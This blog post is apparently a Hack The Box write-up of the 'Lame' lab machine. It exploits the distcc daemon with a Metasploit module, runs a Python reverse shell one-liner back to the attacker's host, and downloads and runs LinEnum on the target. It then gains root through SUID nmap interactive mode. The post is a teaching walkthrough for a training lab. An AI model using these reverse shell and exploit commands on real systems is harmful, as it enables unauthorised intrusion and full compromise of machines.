blog.notrace.io: April 2019

In my last post, I used Metasploit to exploit a SMB vulnerability on HTB’s Lame and get root right off the bat. But, we also found that another vulnerable application – distcc – was listening on port 3632. Let’s run through that and then do some privilege escalation.

Check out my previous post here:

https://blog.notrace.io/2019/04/write-up-hack-box-lame.html

First, let’s hit up El Goog to see what known exploits are available for distcc.

The very first link leads us to Rapid7’s page for a Metasploit module. So, let’s give it a try.

root@kali:~# msfconsole

[-] ***rting the Metasploit Framework console...|

[-] * WARNING: No database support: No database YAML file

[-] ***

Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f

EFLAGS: 00010046

eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001

esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60

ds: 0018 es: 0018 ss: 0018

Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)

Stack: 90909090990909090990909090

90909090990909090990909090

90909090.90909090.90909090

90909090.90909090.09090900

..........................

cccccccccccccccccccccccccc

ccccccccc.................

cccccccccccccccccccccccccc

.................ccccccccc

cccccccccccccccccccccccccc

..........................

ffffffffffffffffffffffffff

ffffffff..................

ffffffffffffffffffffffffff

ffffffff..................

Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00

Aiee, Killing Interrupt handler

Kernel panic: Attempted to kill the idle task!

In swapper task - not syncing

=[ metasploit v5.0.4-dev ]

+ -- --=[ 1852 exploits - 1047 auxiliary - 325 post ]

+ -- --=[ 541 payloads - 44 encoders - 10 nops ]

+ -- --=[ 2 evasion ]

msf5 > search distcc

Matching Modules

================

Name Disclosure Date Rank Check Description

---- --------------- ---- ----- -----------

exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution

msf5 > use exploit/unix/misc/distcc_exec

msf5 exploit(unix/misc/distcc_exec) > set rhosts 10.10.10.3

rhosts => 10.10.10.3

msf5 exploit(unix/misc/distcc_exec) > exploit

[*] Started reverse TCP double handler on 10.10.14.15:4444

[*] Accepted the first client connection...

[*] Accepted the second client connection...

[*] Command: echo uANPhYOytemCLjCC;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets...

[*] Reading from socket B

[*] B: "uANPhYOytemCLjCC\r\n"

[*] Matching...

[*] A is input...

[*] Command shell session 1 opened (10.10.14.15:4444 -> 10.10.10.3:51297) at 2019-04-11 07:01:05 -0400

Now that we have a remote shell, let’s verify we’ve come to the right place and see who we are running as.

ifconfig

eth0 Link encap:Ethernet HWaddr 00:50:56:b2:4d:ba

inet addr:10.10.10.3 Bcast:10.10.10.255 Mask:255.255.255.0

inet6 addr: dead:beef::250:56ff:feb2:4dba/64 Scope:Global

inet6 addr: fe80::250:56ff:feb2:4dba/64 Scope:Link

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:183209 errors:0 dropped:0 overruns:0 frame:0

TX packets:4631 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:13626432 (12.9 MB) TX bytes:739675 (722.3 KB)

Interrupt:19 Base address:0x2000

lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0

inet6 addr: ::1/128 Scope:Host

UP LOOPBACK RUNNING MTU:16436 Metric:1

RX packets:40148 errors:0 dropped:0 overruns:0 frame:0

TX packets:40148 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:20057083 (19.1 MB) TX bytes:20057083 (19.1 MB)

uid=1(daemon) gid=1(daemon) groups=1(daemon)

We are in, but not root. Time to gather some more information to see what our priv esc options are. But first, I want to upgrade this shell to be fully interactive. Unfortunately, Metasploit isn’t a great place to do this because of its session management. So let’s pop another reverse shell back to our Kali box and then upgrade it.

First, I start a netcat listener.

root@kali:~# nc -nvlp 9001

listening on [any] 9001 ...

Then, I’ll run this Python reverse shell on the target box. This can be found on pentestmonkey (http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet).

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.15",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

We catch the reverse shell on the Kali box.

root@kali:~# nc -nvlp 9001

listening on [any] 9001 ...

connect to [10.10.14.15] from (UNKNOWN) [10.10.10.3] 49674

sh: no job control in this shell

sh-3.2$

Now to upgrade. I always copy and paste the commands from this guide when upgrading shells: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/. Check out the full guide for some other tips.

sh-3.2$ python -c 'import pty; pty.spawn("/bin/bash")'

daemon@lame:/tmp$

[CTRL] + [Z] to background the netcat process

[1]+ Stopped nc -nvlp 9001

root@kali:~# stty raw -echo

root@kali:~# fg

Hit [ENTER] a few times.

We now have a fully interactive shell with tab completion.

Next, I want to download and run LinEnum.sh on the target box. LinEnum is a privilege escalation enumeration script and automates a lot of the tedium involved in priv esc.

LinEnum on Github: https://github.com/rebootuser/LinEnum

First, from my Kali box:

Use wget to download the script from Github.

root@kali:~/htb/lame/privesc# wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

--2019-04-11 07:44:15-- https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...

Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.

HTTP request sent, awaiting response... 200 OK

Length: 45639 (45K) [text/plain]

Saving to: ‘LinEnum.sh’

LinEnum.sh 100%[============================================>] 44.57K --.-KB/s in 0.03s

2019-04-11 07:44:15 (1.30 MB/s) - ‘LinEnum.sh’ saved [45639/45639]

And then use the python module SimpleHTTPServer to host it.

root@kali:~/htb/lame/privesc# python -m SimpleHTTPServer 80

Serving HTTP on 0.0.0.0 port 80 ...

Now from the target, I use wget to download the script.

daemon@lame:/tmp$ wget 10.10.14.15/LinEnum.sh

--06:49:19-- http://10.10.14.15/LinEnum.sh

=> `LinEnum.sh.1'

Connecting to 10.10.14.15:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 45,639 (45K) [text/x-sh]

100%[====================================>] 45,639 --.--K/s

06:49:19 (359.15 KB/s) - `LinEnum.sh.1' saved [45639/45639]

Make the script executable using chmod.

daemon@lame:/tmp$ chmod +x LinEnum.sh

And then execute. I’m using -t for thorough scans and then outputting the results to file, LinEnum.results.

daemon@lame:/tmp$ ./LinEnum.sh -t > LinEnum.results

Exerpt from Linenum.results:
[+] Possibly interesting SUID files:
-rwsr-xr-- 1 root dhcp 2960 Apr 2 2008 /lib/dhcp3-client/call-dhclient-script
-rwsr-xr-x 1 root root 780676 Apr 8 2008 /usr/bin/nmap
-rwsr-xr-x 1 root root 46084 Mar 31 2008 /usr/bin/mtr

Looking through the results, I noticed the nmap is owned by root and has the SUID bit set. This means we can execute the binary as root. For some more info on SUID, check this out: https://pentestlab.blog/2017/09/25/suid-executables/

Fortunately for us, nmap can be run in interactive mode and this will be our path to root.

Start nmap in interactive mode:

daemon@lame:/tmp$ /usr/bin/nmap --interactive

Starting Nmap V. 4.53 ( http://insecure.org )

Welcome to Interactive Mode -- press h <enter> for help

nmap>

I'll see what privileges I have first. Use ! to enter shell commands.

nmap> !id

uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)

And then launch another bash session.

nmap> !sh

sh-3.2#

And we’re golden. I can now collect the flag in root.txt.

sh-3.2# cat /root/root.txt

92caac3be140ef****************

blog.notrace.io

Thursday, April 11, 2019

[Write-up] Hack The Box :: Lame, Part 2